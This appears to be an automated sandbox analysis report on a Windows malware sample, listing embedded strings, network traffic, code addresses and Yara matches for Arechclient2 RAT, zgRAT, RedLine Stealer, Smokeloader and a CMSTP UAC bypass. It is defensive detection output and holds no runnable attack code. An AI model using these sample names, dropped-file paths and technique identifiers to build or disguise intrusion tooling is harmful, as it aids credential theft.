Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Source: unknown

HTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.7:49715 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_0081D120 GetClientRect,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,std::_Xinvalid_argument,AlphaBlend,AlphaBlend,BitBlt,

18_2_0081D120

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_6C84A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

18_2_6C84A5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 22.2.cmd.exe.52f0e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.cmd.exe.52f0264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.cmd.exe.54dd976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 22.2.cmd.exe.52ac976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 31.2.cmd.exe.5521e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.UniversalInstaller.exe.43e915b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.UniversalInstaller.exe.36f286d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.UniversalInstaller.exe.373615b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.cmd.exe.5521264.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.UniversalInstaller.exe.43a586d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C25B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	10_2_6C25B700
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C25B8C0 rand_s,NtQueryVirtualMemory,	10_2_6C25B8C0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C25B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	10_2_6C25B910
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	10_2_6C1FF280
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_0040EA54 NtQuerySystemInformation,	13_2_0040EA54

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0041B84B	0_2_0041B84B
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040BA80	0_2_0040BA80
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040C2AC	0_2_0040C2AC
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040BD2A	0_2_0040BD2A
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0042153C	0_2_0042153C
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040C6A0	0_2_0040C6A0
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0041BF69	0_2_0041BF69
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040B70E	0_2_0040B70E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0040BFF1	0_2_0040BFF1
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432BCE7	0_2_0432BCE7
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432C513	0_2_0432C513
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04332607	0_2_04332607
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432F6A8	0_2_0432F6A8
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432BF91	0_2_0432BF91
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432C907	0_2_0432C907
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432B975	0_2_0432B975
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043289C8	0_2_043289C8
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0432C258	0_2_0432C258
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0433BAB2	0_2_0433BAB2
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1F35A0	10_2_6C1F35A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C26542B	10_2_6C26542B
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C26AC00	10_2_6C26AC00
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C235C10	10_2_6C235C10
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C242C10	10_2_6C242C10
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C205440	10_2_6C205440
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C26545C	10_2_6C26545C
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2534A0	10_2_6C2534A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C25C4A0	10_2_6C25C4A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C206C80	10_2_6C206C80
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C236CF0	10_2_6C236CF0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2064C0	10_2_6C2064C0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C21D4D0	10_2_6C21D4D0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FD4E0	10_2_6C1FD4E0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C20FD00	10_2_6C20FD00
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C220512	10_2_6C220512
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C21ED10	10_2_6C21ED10
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2585F0	10_2_6C2585F0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C230DD0	10_2_6C230DD0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C259E30	10_2_6C259E30
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C245600	10_2_6C245600
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C237E10	10_2_6C237E10
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C266E63	10_2_6C266E63
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C214640	10_2_6C214640
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C242E4E	10_2_6C242E4E
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FC670	10_2_6C1FC670
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C219E50	10_2_6C219E50
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C233E50	10_2_6C233E50
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C254EA0	10_2_6C254EA0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C25E680	10_2_6C25E680
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C215E90	10_2_6C215E90
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2676E3	10_2_6C2676E3
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C20FEF0	10_2_6C20FEF0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FBEF0	10_2_6C1FBEF0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C209F00	10_2_6C209F00
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C237710	10_2_6C237710
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2477A0	10_2_6C2477A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C226FF0	10_2_6C226FF0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FDFE0	10_2_6C1FDFE0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C23B820	10_2_6C23B820
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C244820	10_2_6C244820
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C207810	10_2_6C207810
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C23F070	10_2_6C23F070
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C218850	10_2_6C218850
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C21D850	10_2_6C21D850
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2260A0	10_2_6C2260A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C21C0E0	10_2_6C21C0E0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2358E0	10_2_6C2358E0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2650C7	10_2_6C2650C7
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C20D960	10_2_6C20D960
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C24B970	10_2_6C24B970
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C26B170	10_2_6C26B170
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C21A940	10_2_6C21A940
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C22D9B0	10_2_6C22D9B0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C235190	10_2_6C235190
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C252990	10_2_6C252990
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FC9A0	10_2_6C1FC9A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C239A60	10_2_6C239A60
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C224AA0	10_2_6C224AA0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C20CAB0	10_2_6C20CAB0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C262AB0	10_2_6C262AB0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C26BA90	10_2_6C26BA90
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1F22A0	10_2_6C1F22A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C211AF0	10_2_6C211AF0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C23E2F0	10_2_6C23E2F0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C238AC0	10_2_6C238AC0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C23D320	10_2_6C23D320
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C20C370	10_2_6C20C370
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1F5340	10_2_6C1F5340
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C1FF380	10_2_6C1FF380
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2653C8	10_2_6C2653C8
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C37AC30	10_2_6C37AC30
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C366C00	10_2_6C366C00
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2AAC60	10_2_6C2AAC60
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C29ECC0	10_2_6C29ECC0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2FECD0	10_2_6C2FECD0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C36ED70	10_2_6C36ED70
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C428D20	10_2_6C428D20
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3CAD50	10_2_6C3CAD50
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C42CDC0	10_2_6C42CDC0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2A4DB0	10_2_6C2A4DB0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C336D90	10_2_6C336D90
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C380E20	10_2_6C380E20
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C33EE70	10_2_6C33EE70
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C326E90	10_2_6C326E90
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2AAEC0	10_2_6C2AAEC0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C340EC0	10_2_6C340EC0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3E0F20	10_2_6C3E0F20
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2A6F10	10_2_6C2A6F10
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C362F70	10_2_6C362F70
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C30EF40	10_2_6C30EF40
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3E8FB0	10_2_6C3E8FB0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2AEFB0	10_2_6C2AEFB0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C37EFF0	10_2_6C37EFF0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2A0FE0	10_2_6C2A0FE0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2F0820	10_2_6C2F0820
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C32A820	10_2_6C32A820
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C374840	10_2_6C374840
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3A68E0	10_2_6C3A68E0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2F6900	10_2_6C2F6900
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2D8960	10_2_6C2D8960
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3609B0	10_2_6C3609B0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3309A0	10_2_6C3309A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C35A9A0	10_2_6C35A9A0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3BC9E0	10_2_6C3BC9E0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2D49F0	10_2_6C2D49F0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C358A30	10_2_6C358A30
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C34EA00	10_2_6C34EA00
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C31CA70	10_2_6C31CA70
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C31EA80	10_2_6C31EA80
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2A8BAC	10_2_6C2A8BAC
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C340BA0	10_2_6C340BA0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3A6BE0	10_2_6C3A6BE0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C32A430	10_2_6C32A430
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C304420	10_2_6C304420
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2B8460	10_2_6C2B8460
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3CA480	10_2_6C3CA480
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C33A4D0	10_2_6C33A4D0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C2E64D0	10_2_6C2E64D0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00804060	18_2_00804060
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00802120	18_2_00802120
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00826130	18_2_00826130
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0081B150	18_2_0081B150
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00814390	18_2_00814390
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00820390	18_2_00820390
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00855550	18_2_00855550
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0080D570	18_2_0080D570
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_008596E0	18_2_008596E0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0080A6F0	18_2_0080A6F0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_008266F0	18_2_008266F0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_008037B0	18_2_008037B0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0081F840	18_2_0081F840
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0084CAA0	18_2_0084CAA0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00859A00	18_2_00859A00
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_0082FC10	18_2_0082FC10
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_00861DE0	18_2_00861DE0
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C924D8F	18_2_6C924D8F
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C923D16	18_2_6C923D16
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C93371C	18_2_6C93371C
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: 18_2_6C89D24D	18_2_6C89D24D

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: String function: 6C42DAE0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: String function: 6C2C3620 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: String function: 6C2394D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: String function: 6C22CBE8 appears 134 times
